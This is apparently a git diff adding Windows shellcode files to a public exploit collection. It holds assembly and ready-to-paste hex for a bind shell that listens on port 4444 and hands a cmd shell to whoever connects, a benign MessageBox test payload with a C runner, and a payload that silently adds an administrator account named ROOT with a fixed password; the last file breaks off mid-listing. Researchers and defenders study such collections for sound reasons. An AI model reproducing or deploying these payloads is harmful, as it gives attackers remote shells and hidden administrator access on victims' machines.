+ mov [ebp-0x1c], eax     ; save Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom
+
+
+; Call LoadLibraryA(PTR "ws2_32.dll"0x00)
+;   push "ws2_32",0x00 (Null terminated) to the stack and save pointer
+ xor eax, eax            ; clear eax
+ mov ax, 0x3233          ; ASCII: 3 = 0x33, ASCII: 2 = 0x32
+ push eax                ; push 0x00,0x00,"23" to stack (for ws2_32.dll)
+ push 0x5f327377         ; push "_2sw" to the stack (in reverse)
+ push esp                ; push the pointer to the string to the stack
+
+ mov ebx, [ebp-0x1c]     ; LoadLibraryA Address to ebx register
+ call ebx                ; call the LoadLibraryA Function to load ws2_32.dll
+ mov [ebp-0x20], eax     ; save Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom
+
+; Call GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)
+ xor edx, edx
+ mov dx, 0x7075          ; pu : 7075
+ push edx                ; push "up",0x0000 to stack from end of string
+ push 0x74726174         ; trat : 74726174
+ push 0x53415357         ; SASW : 53415357
+ push esp                ; push pointer to string to stack for 'WSAStartup',0x00
+ push dword [ebp-0x20]   ; push base address of ws2_32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddress to EAX
+ call eax                ; GetProcAddress(PTR *ws2_32.dll, "WSAStartup"0x00)
+;   EAX = WSAStartup Address 
+ mov [ebp-0x24], eax     ; save Address of WSAStartup onto Stack 0x24=36; 9th from bottom.
+
+
+; Call WSAStartup - WSAStartUp(MAKEWORD(2, 2),        wsadata_pointer)
+;               int WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
+ xor ebx, ebx            ; EBX = 0x00000000
+ mov bx, 0x0190
+ sub esp, ebx
+ push esp
+ push ebx
+ mov eax, [ebp-0x24]     ; WSAStartup Address
+ call eax                ; call WSAStartUp() to enable tcp networking
+
+
+; Call GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)
+ xor edx, edx
+ mov dx, 0x4174          ; At : 4174 // "WSASocketA",0x0000 string
+ push edx                ; push "tA",0x0000 to stack from end of string
+ push 0x656b636f         ; ekco : 656b636f
+ push 0x53415357         ; SASW : 53415357
+ push esp                ; push pointer to string to stack for 'WSASocketA',0x00
+ push dword [ebp-0x20]   ; push base address of ws2_32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddress to EAX
+ call eax                ; GetProcAddress(PTR *ws2_32.dll, "WSASocketA"0x00)
+;   EAX = WSASocketA Address 
+ mov [ebp-0x28], eax     ; save Address of WSASocketA onto Stack 0x28=40
+
+; Call WSASocketA( AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL);
+ xor ebx, ebx            ; clear ebx
+ push ebx                ; dwFlags  = null
+ push ebx                ; g(group) = null
+ push ebx                ; lpProtocolInfo = null
+ xor ecx, ecx            ; clear ecx
+ mov cl, 6               ; IPPROTO_TCP = 6 // use TCP
+ push ecx                ; push protocol to the stack
+ inc ebx                 ; SOCK_STREAM = 1 // for TCP Socket
+ push ebx                ; push type (of socket) to stack
+ inc ebx                 ; AF_INET = 2 // Use IPv4
+ push ebx                ; Push Address Family (af) ipv4 to stack
+ mov eax, [ebp-0x28]     ; load address of WSASocketA() into eax
+ call eax                ; Call the WSASocketA() Function
+;   EAX = Handle to NewSocket
+ mov [ebp-0x2c], eax     ; save Address New Socket Handle onto Stack 0x2c=44
+
+; struct sockaddr_in { AF_INET = 2; p4444 = 0x5c11; INADDR_ANY = 0x00000000; };
+ xor ebx, ebx            ; clear ebx
+ push ebx                ; IP address =  INADDR_ANY
+ push word 0x5c11        ; 0x115c = port 4444
+ add bl, 2               ; AF_INET = 2
+ push word bx            ; push ipv4 af to stack
+ mov [ebp-0x30], esp     ; save Address of sockaddr_in struct onto Stack 0x30=48
+
+; Call GetProcAddress(PTR *ws2_32.dll, "bind"0x00)
+ xor ecx, ecx
+ push ecx                ; Null terminate string "bind" on stack
+ push 0x646e6962         ; dnib : 646e6962 - push "bind"
+ push esp                ; push pointer-to-string to stack for 'bind',0x00
+ push dword [ebp-0x20]   ; push base address of ws2_32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddress to EAX
+ call eax                ; GetProcAddress(PTR *ws2_32.dll, "bind"0x00)
+;   EAX = bind base-address 
+ mov [ebp-0x34], eax     ; save Address of bind onto Stack 0x34=52
+
+; Call bind(ptr socketHandle, ptr sockaddr_in, sizeof(sockaddr_in) = 16);
+ push byte 16            ; push size of sockaddr_in struct
+ push dword [ebp-0x30]   ; Push pointer to sockaddr_in 
+ push dword [ebp-0x2c]   ; push socket handle returned from WSASocketA()
+ mov eax, [ebp-0x34]     ; load address of bind()
+ call eax                ; Call the bind() function
+
+; Call GetProcAddress(PTR *ws2_32.dll, "listen"0x00)
+ xor ecx, ecx
+ mov cx, 0x6e65          ; ne : 6e65 // "listen",0x0000 string
+ push ecx                ; push "en",0x00,0x00 to stack
+ push 0x7473696c         ; tsil : 7473696c - push "list" to stack 
+ push esp                ; push pointer-to-string to stack for 'listen',0x00
+ push dword [ebp-0x20]   ; push base address of ws2_32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddress to EAX
+ call eax                ; GetProcAddress(PTR *ws2_32.dll, "listen")
+;   EAX = listen() base-address 
+ mov [ebp-0x38], eax     ; save Address of listen() onto Stack 0x38=56
+
+; Call listen(ptr socketHandle, int backlog);
+ xor ecx, ecx
+ push ecx                ; backlog is used for multple connections. We only need 1, so set to zero.
+ push dword [ebp-0x2c]   ; push socket handle returned from WSASocketA()
+ mov eax, [ebp-0x38]     ; load address of listen() that we saved to the stack eariler
+ call eax                ; Call the listen() function
+
+; Call GetProcAddress(PTR *ws2_32.dll, "accept"0x00)
+ xor ecx, ecx
+ mov cx, 0x7470          ; tp : 7470 // "accept",0x0000 string
+ push ecx                ; push "en",0x00,0x00 to stack
+ push 0x65636361         ; ecca : 65636361 - push "acce" to stack 
+ push esp                ; push pointer-to-string to stack for 'accept',0x00
+ push dword [ebp-0x20]   ; push base address of ws2_32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddress to EAX
+ call eax                ; GetProcAddress(PTR *ws2_32.dll, "accept")
+;   EAX = listen() base-address 
+ mov [ebp-0x3c], eax     ; save Address of accept() onto Stack 0x3c=60
+
+; Call accept(ptr socketHandle, ptr sockaddr_in, ptr addrlen(optional))
+; sockaddr_in is optional here. It is for filtering the connecting host
+ xor ecx, ecx
+ push ecx                ; push Null for optional ptr addrlen
+ push ecx                ; push Null for optional ptr sockaddr_in
+ push dword [ebp-0x2c]   ; push socket handle returned from WSASocketA()
+ mov eax, [ebp-0x3c]     ; load address of accept() that we saved eariler
+ call eax                ; Call the accept() function
+ mov [ebp-0x40], eax     ; save Handle to clientSocket, returned form accept(), onto Stack 0x40=64
+
+; struct _PROCESS_INFORMATION {PTR hProcess; PTR hThread; DWORD dwProcessId; DWORD dwThreadId; }
+ mov edx, 0x646d6363     ; "ccmd"
+ shr edx, 8              ; edx = "cmd",0x00 // shr edx, 8 = Shifts the edx register to the right 8 bits
+ push edx
+ mov [ebp-0x44], esp     ; save PTR to String "cmd",0x00 on stack
+ xor edx, edx            ; clear edx register
+ sub esp, 0x10           ; Decrement the stack by 16 bytes (0x10)
+ mov [ebp-0x48], esp     ; save Address of PROCESS_INFORMATION struct onto Stack 0x48=72
+
+; typedef struct _STARTUPINFOA { DWORD  cb; LPSTR  lpReserved; LPSTR  lpDesktop; LPSTR  lpTitle; DWORD  dwX; DWORD  dwY; DWORD  dwXSize; DWORD  dwYSize; DWORD  dwXCountChars; DWORD  dwYCountChars; DWORD  dwFillAttribute; DWORD  dwFlags; WORD   wShowWindow; WORD   cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; }
+ xor edx, edx            ; clear edx register
+;   Redirect STDIN, STDOUT, STDERR to the clientSocket returned from accept() when client connected (similar to dup2 in linux)
+ push dword [ebp-0x40]   ; HANDLE hStdError  = Handle to clientSocket
+ push dword [ebp-0x40]   ; HANDLE hStdOutput = Handle to clientSocket
+ push dword [ebp-0x40]   ; HANDLE hStdInput  = Handle to clientSocket
+ push edx
+ push edx
+ xor eax, eax            ; clear eax register
+ inc eax
+ rol eax, 0x08
+ inc eax
+ push eax
+ push edx                ; DWORD dwFlags          = Null
+ push edx                ; DWORD dwFillAttribute  = Null
+ push edx                ; DWORD dwYCountChars    = Null
+ push edx                ; DWORD dwXCountChars    = Null
+ push edx                ; DWORD dwXSize          = Null
+ push edx                ; DWORD dwY              = Null
+ push edx                ; DWORD dwX              = Null
+ push edx                ; PTR lpTitle            = Null
+ push edx                ; PTR lpDesktop          = Null
+ push edx                ; PTR lpReserved         = Null
+ xor eax, eax            ; clear eax register
+ add al, 0x44            ; DWORD cb               = 0x44(68) // Sizeof STARTUP_INFO
+ push eax                ; push cb onto the stack
+ mov [ebp-0x4c], esp     ; save pointer to STARTUP_INFO struct onto Stack 0x4c=76
+
+; Call GetProcAddress(PTR *kernel32.dll, "CreateProcessA"0x00)
+ xor edx, edx
+ mov dx, 0x4173          ; As : 4173 // "CreateProcessA",0x0000 string
+ push edx                ; push "sA",0x0000 to stack from end of string
+ push 0x7365636f         ; seco : 7365636f
+ push 0x72506574         ; rPet : 72506574
+ push 0x61657243         ; aerC : 61657243
+ push esp                ; push pointer to string to stack for 'CreateProcessA',0x00
+ push dword [ebp-0x8]    ; push base address of kernel32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddress to EAX
+ call eax                ; GetProcAddressA(PTR *kernel32.dll, "CreateProcessA"0x00)
+;   EAX = CreateProcessA Address
+ mov [ebp-0x50], eax     ; save Address of CreateProcessA onto Stack 0x50=80
+
+; CreateProcessA(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
+ xor edx, edx            ; clear edx register
+ push dword [ebp-0x48]   ; PROCESS_INFORMATION
+ push dword [ebp-0x4c]   ; STARTUP_INFO
+ push edx                ; lpCurrentDirectory = Null
+ push edx                ; lpEnvt = Null
+ push edx                ; dwCreationFlags = 0/Null
+ xor eax, eax            ; clear eax
+ inc eax                 ; bInheritHandles = True = 1
+ push eax                ; push 1 to stack for bInheritHandles
+ push edx                ; lpThdAttrs = Null
+ push edx                ; lpPsAttrs  = Null
+ push dword [ebp-0x44]   ; lpCmdLine = push PTR to String "cmd",0x00 on stack
+ push edx                ; lpAppName = Null
+ mov ebx, [ebp-0x50]     ; Address for CreateProcessA 
+ call ebx                ; create process cmd 
+
+; Call GetProcAddress(PTR *kernel32.dll, "ExitProcess"0x00)
+ xor ecx, ecx
+ mov ecx, 0x73736501     ; sse : 73736501 = 0x01,"ess" // "ExitProcess",0x0000 string
+ shr ecx, 8              ; ecx = "ess",0x00
+ push ecx                ;  sse : 00737365 
+ push 0x636f7250         ; corP : 636f7250
+ push 0x74697845         ; tixE : 74697845
+ push esp                ; push pointer to string to stack for 'ExitProcess',0x00
+ push dword [ebp-0x8]    ; push base address of kernel32.dll to stack
+ mov eax, [ebp-0x18]     ; PTR to GetProcAddressA to EAX
+ call eax                ; GetProcAddressA(PTR *kernel32.dll, "ExitProcess"0x00)
+;   EAX = ExitProcess Address
+ mov [ebp-0x54], eax     ; save Address of ExitProcess onto Stack 0x54=84
+
+; Call ExitProcess(exitcode)
+ xor edx, edx
+ push eax
+ mov eax, [ebp-0x54]     ; ExitProcess(exitcode)
+ call eax
+
+
+;   sub esp, 0x60 = Dec stack by 0x96 for shellcode variables
+;   [ebp-0x4]  = PTR to string at bottom of stack (ebp)
+;   [ebp-0x8]  = Save the base address of kernel32.dll in the 2nd from bottom position on our stack
+;   [ebp-0xC]  = Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame
+;   [ebp-0x10] = PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)
+;   [ebp-0x14] = PTR to Address Table Address at 5th from bottom of stack (ebp-20)
+;   [ebp-0x18] = Address of GetProcAddress onto Stack 0x18=24; 6th from bottom
+;   [ebp-0x1c] = Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom
+;   [ebp-0x20] = Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom
+;   [ebp-0x24] = Address of WSAStartup onto Stack 0x24=36; 9th from bottom.
+;   [ebp-0x28] = Address of WSASocketA onto Stack 0x28=40
+;   [ebp-0x2c] = Address New Socket Handle onto Stack 0x2c=44
+;   [ebp-0x30] = Address of sockaddr_in struct onto Stack 0x30=48
+;   [ebp-0x34] = Address of bind onto Stack 0x34=52
+;   [ebp-0x38] = Address of listen() onto Stack 0x38=56
+;   [ebp-0x3c] = Address of accept() onto Stack 0x3c=60
+;   [ebp-0x40] = Handle to clientSocket, returned form accept(), onto Stack 0x40=64
+;   [ebp-0x44] = PTR to String "cmd",0x00 on stack 0x44=68
+;   [ebp-0x48] = Pointer to PROCESS_INFORMATION struct onto Stack 0x48=72
+;   [ebp-0x4c] = Pointer to STARTUP_INFO struct onto Stack 0x4c=76
+;   [ebp-0x50] = Address of CreateProcessA onto Stack 0x50=80
+;   [ebp-0x54] = Address of ExitProcess onto Stack 0x54=84
+
+# Compiled on Kali with nasm
+;root@kali# nasm -f win32 bindShell.asm -o bindShell.o
+; for i in $(objdump -D bindShell.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+# Preformated for the lazy
+;shellcode  = "\x55\x89\xe5\x83\xec\x60\x31\xc0\x66\xb8\x73\x73\x50\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65"
+;shellcode += "\x74\x50\x89\x65\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x40\x1c\x89\xc3\x8b\x03\x89\xc3\x8b\x03\x8b"
+;shellcode += "\x40\x08\x89\x45\xf8\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf4\x8b\x4b\x24"
+;shellcode += "\x01\xc1\x89\x4d\xf0\x8b\x53\x1c\x01\xc2\x89\x55\xec\x8b\x53\x14\x31\xc0\x8b\x7d\xf4\x8b\x75\xfc\x31\xc9"
+;shellcode += "\xfc\x8b\x3c\x87\x03\x7d\xf8\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf0\x8b\x55\xec"
+;shellcode += "\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xf8\x89\x45\xe8\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72"
+;shellcode += "\x68\x4c\x6f\x61\x64\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xe4\x31\xc0\x66\xb8\x33\x32\x50\x68\x77"
+;shellcode += "\x73\x32\x5f\x54\x8b\x5d\xe4\xff\xd3\x89\x45\xe0\x31\xd2\x66\xba\x75\x70\x52\x68\x74\x61\x72\x74\x68\x57"
+;shellcode += "\x53\x41\x53\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xdc\x31\xdb\x66\xbb\x90\x01\x29\xdc\x54\x53\x8b"
+;shellcode += "\x45\xdc\xff\xd0\x31\xd2\x66\xba\x74\x41\x52\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\xff\x75\xe0\x8b"
+;shellcode += "\x45\xe8\xff\xd0\x89\x45\xd8\x31\xdb\x53\x53\x53\x31\xc9\xb1\x06\x51\x43\x53\x43\x53\x8b\x45\xd8\xff\xd0"
+;shellcode += "\x89\x45\xd4\x31\xdb\x53\x66\x68\x11\x5c\x80\xc3\x02\x66\x53\x89\x65\xd0\x31\xc9\x51\x68\x62\x69\x6e\x64"
+;shellcode += "\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xcc\x6a\x10\xff\x75\xd0\xff\x75\xd4\x8b\x45\xcc\xff\xd0\x31"
+;shellcode += "\xc9\x66\xb9\x65\x6e\x51\x68\x6c\x69\x73\x74\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xc8\x31\xc9\x51"
+;shellcode += "\xff\x75\xd4\x8b\x45\xc8\xff\xd0\x31\xc9\x66\xb9\x70\x74\x51\x68\x61\x63\x63\x65\x54\xff\x75\xe0\x8b\x45"
+;shellcode += "\xe8\xff\xd0\x89\x45\xc4\x31\xc9\x51\x51\xff\x75\xd4\x8b\x45\xc4\xff\xd0\x89\x45\xc0\xba\x63\x63\x6d\x64"
+;shellcode += "\xc1\xea\x08\x52\x89\x65\xbc\x31\xd2\x83\xec\x10\x89\x65\xb8\x31\xd2\xff\x75\xc0\xff\x75\xc0\xff\x75\xc0"
+;shellcode += "\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x44\x50\x89"
+;shellcode += "\x65\xb4\x31\xd2\x66\xba\x73\x41\x52\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\xff"
+;shellcode += "\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xb0\x31\xd2\xff\x75\xb8\xff\x75\xb4\x52\x52\x52\x31\xc0\x40\x50\x52"
+;shellcode += "\x52\xff\x75\xbc\x52\x8b\x5d\xb0\xff\xd3\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63"
+;shellcode += "\x68\x45\x78\x69\x74\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xac\x31\xd2\x50\x8b\x45\xac\xff\xd0"
\ No newline at end of file
diff --git a/shellcodes/windows/48229.txt b/shellcodes/windows/48229.txt
new file mode 100644
index 000000000..94fd9912e
--- /dev/null
+++ b/shellcodes/windows/48229.txt
@@ -0,0 +1,185 @@
+# Shellcode Title:  Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
+# Shellcode Author: Bobby Cooke
+# Date: March 2020-03-17
+# Tested On: 
+# Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe
+# Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe  
+# [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE
+
+; Create new StackFrame
+ push ebp
+ mov ebp, esp
+ sub esp, 0x10
+
+; Dynamically find the base address of the executable image from the PEB
+; FS_Register > TEB > PEB > &ImageBase
+ xor ecx, ecx
+ mul ecx                 ; Clears EAX, ECX, EDX Registers
+ mov ebx, eax            ; clear EBX Register
+ mov ebx, [fs:ebx+0x30]  ; get PEB address = TEB+0x30
+ mov ebx, [ebx+0x8]      ; get Image Base Addr = PEB+0x8
+ push ebx                ; save &ImageBase in EBX
+ pop  eax                ; copy &ImageBase to EAX
+
+; Get the Address of the Import Table
+; DOS_Header > PE_Signature > ImportTable
+ add eax, [ebx+0x3C]     ; EAX = &PE_Signature
+ mov dl, 0x80            ; &PE_Signature+0x80 = &ImportTable_RVA
+ add ax, dx              ; EAX = &ImportTable_RVA
+ mov edx, [eax]          ; EDX = RVA ImportTable
+ add edx, ebx            ; EDX = &ImportTable
+ add dl, 0xC             ; EDX = &Name_RVA of first Imported DLL
+
+; Create string 'USER32'
+ mov cx, 0x3233          ; 23 : 3233
+ push ecx                ; push "23, 0x0000"
+ push 0x52455355         ; RESU : 52455355
+ mov [ebp-0x4], esp
+
+
+; Find the Name RVA for user32.dll within the Import Table
+; ImportTable > ImportDirectoryTable > LoopNameRVA's
+ xor ecx, ecx            ; ECX = Counter
+
+fUser32Name:
+ push edx                ; EDX = &Name_RVA of first Imported DLL
+ xor eax, eax
+ mov al, 0x14            ; &Name_RVA's are every 20 bytes
+ mul cl                  ; Counter * 20 bytes
+ add [esp], eax
+ pop eax                 ; EAX = &Name_RVA of Nth DLL
+ push eax
+ mov esi, [ebp-0x4]      ; ESI = &String
+ mov edi, [eax]          ; EDI = RVA Name of Nth DLL
+ add edi, ebx            ; EDI = &Name of Nth DLL
+ push ecx                ; save counter to stack
+ xor ecx, ecx
+ cld                     ; clear direction flag = Process strings from left to right
+ mov cl, 0x6             ; ECX = String Length
+ repe cmpsb              ; compare first 6 bytes of &
+ pop ecx                 ; ECX = Counter
+ jz foundUser32Name      ; If string at &Name_RVA == "USER32", then end loop
+ pop eax                 ; Pickup String Addr to fix stack
+ inc ecx                 ;   else Counter ++
+ jmp short fUser32Name   ;   restart the loop
+
+foundUser32Name:
+ pop eax                 ; EAX = &Name_RVA of user32.dll
+ mov [ebp-0x8], eax      ; [ESP-0x8] = &Name_RVA of user32.dll
+ sub al, 0xC             ; EAX = &User32_ImportNameTable_RVA
+ mov eax, [eax]          ; EAX = User32_ImportNameTable_RVA
+ add eax, ebx            ; EAX = &User32_ImportNameTable
+ mov [ebp-0xC], eax      ; [ESP-0xC] = &User32_ImportNameTable
+
+; Create string 'MessageBoxA'
+ mov ecx, 0x41786f6f     ; Axoo : 41786f6f
+ shr ecx, 8
+ push ecx                ; "oxA,0x00"
+ push 0x42656761         ; Bega : 42656761
+ push 0x7373654d         ; sseM : 7373654d
+
+ jmp Counter
+
+MessageBoxW:
+ mov byte [esp+0xA], 0x57 ; Change A to W
+ mov eax, [ebp-0xC]       ; EAX = &User32_ImportNameTable
+
+; Find the Name RVA for MessageBoxA within the Import Table
+; ImportTable > ImportDirectoryTable > LoopNameRVA's
+
+Counter:
+ xor ecx, ecx
+
+fNameLoop:
+ mov esi, esp            ; ESI = "MessageBoxA,0x00"
+ xor edx, edx
+ mov edi, [eax]          ; EDI = RVA NameString
+ cmp edi, edx            ; See if we checked all imported function names
+ je MessageBoxW
+ add edi, ebx            ; EDI = &NameString of Nth Function
+ inc edi                 ; skip the first 2 bytes - Ordinal Value
+ inc edi                 ; skip the first 2 bytes
+ push ecx                ; push counter value
+ xor ecx, ecx
+ cld                     ; clear direction flag = Process strings from left to right
+ mov cl, 0xB             ; ECX = String Length
+ repe cmpsb              ; compare first 11 bytes
+ pop ecx                 ; ECX = Counter value
+ jz foundName            ; If string at &NameString == "MessageBox-", then end loop
+ mov dl, 0x4
+ add eax, edx            ; Next RVA NameString of Imported User32.dll function
+ inc ecx                 ; Counter ++
+ jmp short fNameLoop     ; restart the loop
+
+foundName:
+ mov eax, [ebp-0x8]      ; EAX = &User32_Name_RVA
+ add al, 0x4             ; EAX = &User32_ImportAddressTable_RVA
+ mov edi, [eax]          ; EDI = User32_ImportAddressTable_RVA
+ add edi, ebx            ; EDI = &User32_ImportNameTable
+ xor eax, eax
+ mov al, 0x4
+ mul cx                  ; Counter * 4 = Offset MessageBoxA in Table
+ add eax, edi            ;[EAX] = &MessageBoxA
+ mov eax, [eax]          ; EAX = &MessageBoxA
+
+ mov byte bl, [esp+0xA]  ; DL = 'A' or 'W'
+
+;CALL to MessageBoxA
+;  hOwner = NULL
+;  Text = "BOKU"
+;  Title = "BOKU"
+;  Style = MB_OK|MB_APPLMODAL
+ xor ecx, ecx        ; clear ecx register
+ push ecx            ; string terminator 0x00 for string "BOKU"
+; MessageBoxA or MessageBoxW?
+ cmp bl, 0x41            ; if BL = 'A', then
+ je MsgBoxA              ; push ASCII string
+; String = "B-O-K-U-"
+ push 0x2d552d4b     ; -U-K : 2d552d4b
+ push 0x2d4f2d42     ; -O-B : 2d4f2d42
+ mov edx, esp        ; EDX = &String
+UnicodeStrLoop:
+ inc edx             ; 1st Char +1
+ mov byte [edx], ch  ; Null byte after ever char in Unicode String
+ inc edx             ; Every Other Char +2
+ inc ecx             ; LoopCounter ++
+ cmp cl, 0x4         ; If end of string, then
+ je pushArgs         ; Push arguments to stack for MessageBox- Call
+ jmp short UnicodeStrLoop
+MsgBoxA:
+ push 0x554b4f42     ; UKOB : 554b4f42
+pushArgs:
+ xor ecx, ecx
+ mov ebx, esp        ; EBX = &String
+ push ecx
+ push ebx
+ push ebx
+ push ecx
+ call eax            ; Call MessageBox- Function
+
+############################################################################################################################
+
+#include <windows.h>
+#include <stdio.h>
+
+char code[] = \
+"\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b"
+"\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c"
+"\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0"
+"\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31"
+"\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c"
+"\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68"
+"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45"
+"\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51"
+"\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b"
+"\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b"
+"\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d"
+"\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb"
+"\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0";
+
+int main(int argc, char **argv)
+{
+  int (*func)();
+  func = (int(*)()) code;
+  (int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86-64/48252.txt b/shellcodes/windows_x86-64/48252.txt
new file mode 100644
index 000000000..e91e2b6a3
--- /dev/null
+++ b/shellcodes/windows_x86-64/48252.txt
@@ -0,0 +1,127 @@
+## Exploit Title: Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-03-21
+## Tested on:   Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
+## Description: Windows Shellcode that adds the user 'ROOT' with the password 'I@mR00T$' to the system. The user 'ROOT' is then added to the localgroup 'Administrators'.
+
+get_kernel32_address:
+xor eax, eax
+mov eax, [fs:eax+0x30] ; EAX = &PEB
+mov eax, [eax+0xC]     ; EAX = &LDR
+mov esi, [eax+0x1C]    ; ESI = 1st entry InitOrderList - ntdll.dll
+lodsd                  ; EAX = 2nd entry InitOrderList - kernelbase.dll
+xchg esi, eax
+lodsd                  ; EAX = 3rd entry InitOrderList - kernel32.dll
+mov eax, [eax+0x8]     ; EAX = &Kernel32.dll
+push eax
+
+get_kernel32_export_table:
+mov ebx, [eax+0x3C] ; EBX = RVA NewEXEHeader
+add ebx, eax        ; EBX = &NewEXEHeader
+mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
+add ebx, eax        ; EBX = &ExportTable
+
+get_export_name_table:
+mov edx, [ebx+0x20] ; EDX = RVA ExportNameTable
+add edx, eax        ; EDX = &ExportNameTable
+
+get_export_ordinal_table:
+mov ecx, [ebx+0x24] ; ECX = RVA ExportOrdinalTable
+add ecx, eax        ; ECX = &ExportOrdinalTable
+push ecx
+
+get_export_addr_table:
+mov edi, [ebx+0x1C] ; EDI = RVA ExportAddrTable
+add edi, eax        ; EDI = &ExportAddrTable
+push edi
+
+WinExec_String:
+push 0x456E6957 ; EniW
+
+counter_init:
+xor eax, eax    ; EAX = Counter
+
+searchLoop:
+mov edi, edx    ; EDI = &ExportNameTable
+mov esi, esp    ; ESI = "WinE"
+xor ecx, ecx
+cld                  ; Process strings left to right
+mov edi, [edi+eax*4] ; EDI = RVA NthNameString
+add edi, [esp+0xC]   ; EDI = &NthNameString
+add cx, 0x4          ; ECX = len("WinE")
+repe cmpsb           ; compare [&NthNameString] to "WinExec"
+jz found             ; If [&NthNameString] == "WinExec" end loop
+inc eax              ; Counter ++
+jmp short searchLoop ; restart loop
+
+found:
+mov ecx, [esp+0x8]     ; ECX = &ExportOrdinalTable
+mov ax,  [ecx + eax*2] ;  AX = ordinalNumber
+mov edx, [esp+0x4]     ; EDX = &ExportAddrTable
+mov ebx, [edx + eax*4] ; EBX = RVA WinExec
+add ebx, [esp+0xC]     ; EBX = &WinExec
+
+add_user:
+; Call WinExec( CmdLine, ShowState );
+; $CmdLine = 'cmd.exe /c net user ROOT I@mR00T$ /ADD && net localgroup Administrators ROOT /ADD'
+; $ShowState = SW_HIDE  
+xor ecx, ecx
+mul ecx
+mov al, 0x44    ; D : 44
+push eax
+push 0x44412f20 ; DA/  
+push 0x544f4f52 ; TOOR 
+push 0x2073726f ;  sro 
+push 0x74617274 ; tart 
+push 0x73696e69 ; sini 
+push 0x6d644120 ; mdA  
+push 0x70756f72 ; puor 
+push 0x676c6163 ; glac 
+push 0x6f6c2074 ; ol t 
+push 0x656e2026 ; en & 
+push 0x26204444 ; & DD 
+push 0x412f2024 ; A/ $ 
+push 0x54303052 ; T00R 
+push 0x6d404920 ; m@I  
+push 0x544f4f52 ; TOOR 
+push 0x20726573 ;  res 
+push 0x75207465 ; u te 
+push 0x6e20632f ; n c/ 
+push 0x20657865 ;  exe 
+push 0x2e646d63 ; .dmc 
+mov eax, esp    ; EAX = &CmdLine
+push ecx        ; $ShowState 
+push eax        ; $CmdLine
+call ebx        ; Call the WinExec Function
+
+###############################################
+
+#include <windows.h>
+#include <stdio.h>
+
+char code[] = \
